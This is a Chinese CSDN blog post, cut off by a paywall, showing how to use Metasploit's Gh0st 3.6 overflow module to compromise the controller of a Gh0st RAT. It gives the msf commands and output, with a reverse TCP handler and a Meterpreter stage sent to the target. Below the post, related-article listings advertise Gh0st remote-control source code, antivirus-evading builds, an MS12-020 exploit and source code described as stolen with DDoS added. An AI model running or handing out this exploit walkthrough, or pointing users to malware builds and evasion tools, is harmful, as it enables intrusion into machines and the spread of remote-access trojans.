利用Gh0st 3.6远程溢出漏洞反向控制攻击者

最新推荐文章于 2023-11-20 15:38:05 发布
VIP文章 最新推荐文章于 2023-11-20 15:38:05 发布
阅读量894 收藏 1
点赞数
分类专栏: MSF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k8gege/article/details/103949242
版权

title: 利用Gh0st 3.6远程溢出漏洞反向控制攻击者
comments: true
toc: true
categories:

  • [Metasploit]
  • [Exp]
    tags:
  • Metasploit
  • Overflow
  • Gh0st
    date: 2020-01-12 18:30:10
    abbrlink: 30568

前言

漏洞验证在2017年被公开,实际上Gh0st溢出漏洞在2009年时就已被人爆出过多个
可见使用开源C2工具,不见得安全,最好是经过二次修改,单纯做免杀可防不了哦

MSF

Teston WinXP at 2017-09-15
运行Gh0st客户端,然后通过MSF溢出C2客户端机器,即可反向获取攻击者机器权限

msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set RHOST 192.168.1.126
RHOST => 192.168.1.126
msf exploit(gh0st) > run

[*] Started reverse TCP handler on 192.168.1.125:4444 
[*] 192.168.1.126:80 - Trying target Gh0st Beta 3.6
[*] 192.168.1.126:80 - Spraying heap...
[*] 192.168.1.126:80 - Trying command 103...
[*] Sending stage (957999 bytes) to 192.168.1.126
[*] Meterpreter s
最低0.47元/天 解锁文章
k8gege
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
gh0st3.6_src红狼官方_源码_远程_Gh0st_远程控制_
10-02
远程控制软件源代码,Gh0st3.6版,真正可以编译的源代码
黑客内参--黑产攻击途径升级,云服务成重灾区
weixin_33922670的博客
11-18 206
在黑客内参的印象里,黑产以及相关的肉鸡DDOS攻击总是离黑客内参很远。可实际情况并非如此,特别是在云服务大行其道的今天。日前,黑客内参就观察到了国内云服务中Gh0st远控新样本出现爆发式增长,并就此进行了分析溯源。在经过黑客内参反病毒工程师一系列分析后,黑客内参发现这些样本在云服务上的应用分为两种:1,使用大量低配置云服务器进行样本生成和分发,明显的典型黑产团队化操作行为。2,黑客利用漏洞进行渗透...
Pytorch实战__反向攻击(Adversarial Attack)
hello_JeremyWang的博客
11-18 3098
0. 介绍 首先需要指出的是,代码是从李宏毅老师的课程中下载的,并不是我自己码的。这篇文章主要是在原代码中加了一些讲解和注释,以及将繁体字改成了简体字。 今天的内容,说实在话,有点像是教咱们如何成为一名“特工”(哈哈~~碰巧最近在回顾马特达蒙的谍影重重,感觉这一部分还挺有趣)。 首先我们来介绍一下反向攻击这个词以及代码中涉及的算法。反向攻击就是在原图片中加一些极其微小的杂讯(这些杂讯有时候人眼根本看不出来),以使得我们之前训练出来的很不错的神经网络失效。听起来是不是很酷,以后提前偷摸下班的时候就可以不被摄像
开源一款远程控制软件 —— gh0st
最新发布
左雪菲的专栏
11-20 630
全部编译成功后,在gh0st\Output\Debug\bin目录下会生成Gh0st.exe和svchost.exe,先启动Gh0st.exe,再启动svchost.exe就可以对运行了svchost.exe的机器进行远程控制了。虽然,很多做法在新的操作系统中已经过时或者没有必要,但是其软件的架构原理、过杀毒软件的设计思路和许多经典的做法,非常值得我们学习,尤其是对Windows客户端开发的朋友来说,绝对是提高内功的优秀学习资料。注意的是:这是一款类似于木马性质的软件,请勿作任何非法用途,否则后果自负!
Gh0st控制远程溢出
oceanark的博客
07-13 745
发布时间:2009-5-18 更新时间:2009-5-18 严重程度:高 威胁程度:控制远程主机 错误类型:边界检查错误 利用方式:主机模式 受影响系统 Gh0st3.6之前所有版本 Gh0st 发现漏洞,这些漏洞可以被用户利用,可以从被控端向控制端发送恶意代码,达到控制主控端的主机。 1)gh0st3.6\gh0st\FileManagerDlg.cpp中
GHost漏洞(CVE-2015-0235)
公众号shadow sock7
04-10 1577
来源:https://www.openwall.com/lists/oss-security/2015/01/27/9 https://nvd.nist.gov/vuln/detail/CVE-2015-0235 参考: 如何检查并修复GHOST(CVE-2015-0235)漏洞 Linux GHOST vulnerability (CVE-2015-0235) is not as scary a...
Tomcat 幽灵猫任意文件读取漏洞(CVE-2020-1938)
Li-D的博客
09-16 3344
漏洞描述 Tomcat服务器是一个免费的开放源代码的Web应用服务器,属于轻量级应用服务器。Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 漏洞影响版本 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 漏洞危害 攻击者利用漏洞进行任意文
Gh0st3.6原版,红狼远程控制软件源码
07-30
Gh0st3.6原版,红狼远程控制软件源码,是一款非常优秀的远程控制软件,值得学习。
gh0st3.6_src.zip
09-03
著名的远程控制软件源码,没有修改过的,只能用于学习,交流,不可用于非法用途。
Gh0st3.6vs10远程控制源码
07-30
Gh0st3.6vs10远程控制源码可用VC2010编译,亲测能编译通过。值得学习。
GH0ST最新免杀版无后门
11-05
免杀版 GH0ST 无后门 最新 免杀版 GH0ST 无后门 最新
Ghost3.6远程协助
07-04
Ghost升级版。 PS:使用前务必关杀毒软件以防误杀此工具
Gh0St3.75,支持win7、win8、64位屏幕,目前碰过最好的版本
06-01
目前最好的一般版本,支持代理,3389,更新,端口映射等等各种,功能最强大的一个版本,bin文件。
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
03-09
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
gh0st源码-(ddos和cpu核数与开机时间)
03-21
服务器偷来的源码。。加了ddos+cpu核数+开机时间..
红狼远控gh0st3.6版本的vs2010 vs2013 vs2015 vs2017
04-05
红狼远控gh0st3.6版本的vs2010工程源码,可通过vs2010 vs2013 vs2015 vs2017进行编译,已去除硬盘锁,并且代码加上详细注释可供学习参考。
Wannacry ExternalBlue漏洞又被利用 Backdoor.Nitol和Gh0st远程控制恶意软件正在传播
weixin_33980459的博客
09-01 511
在WannaCry 勒索病毒中被使用的ExternalBlue, 现在正被用来分发 Backdoor.Nitol和 Gh0st 远程控制RAT恶意软件。FireEye 的安全研究人员说, 正如 WannaCry 网络犯罪分子所做的那样, 威胁行为者也是利用了相同的microsoft 服务器消息块 (smb) 协议漏洞 (MS017-010)。 Fire...
Gh0st 3.6 存在的BUG及修改方法(收集整理)
oceanark的博客
07-13 3547
以下贴出代码全部为修改后的 --------------------------------------------------------------------------------------------------------------------------------- 1.拖放文件上传和下载时,有选择目标目录的话,可能会使目录重复 修改CFile
Gh0st通信协议解析(2)
ccnyou的专栏
06-08 6973
原文链接:http://blog.renren.com/blog/bp/Q78RzCJjOx 从被控端主动去连接主控端开始谈起。世间万事万物有始有终,宇宙环宇的动力起点就是上帝的那一推之力。当然,主控端与被控端的交互总是从被控端主动连接到主控端开始的,让我们从发起连接这个引爆点谈起…… ************************************************
易语言远程控制源码gh0st0.7
09-09
综上所述,gh0st0.7源码是一份基于易语言编写的远程控制工具,它利用易语言的简单易学和强大功能,实现了远程文件管理、远程桌面等多种功能。该源码使用了TCP/IP和UDP等通信协议,提供了密码保护和加密传输等安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值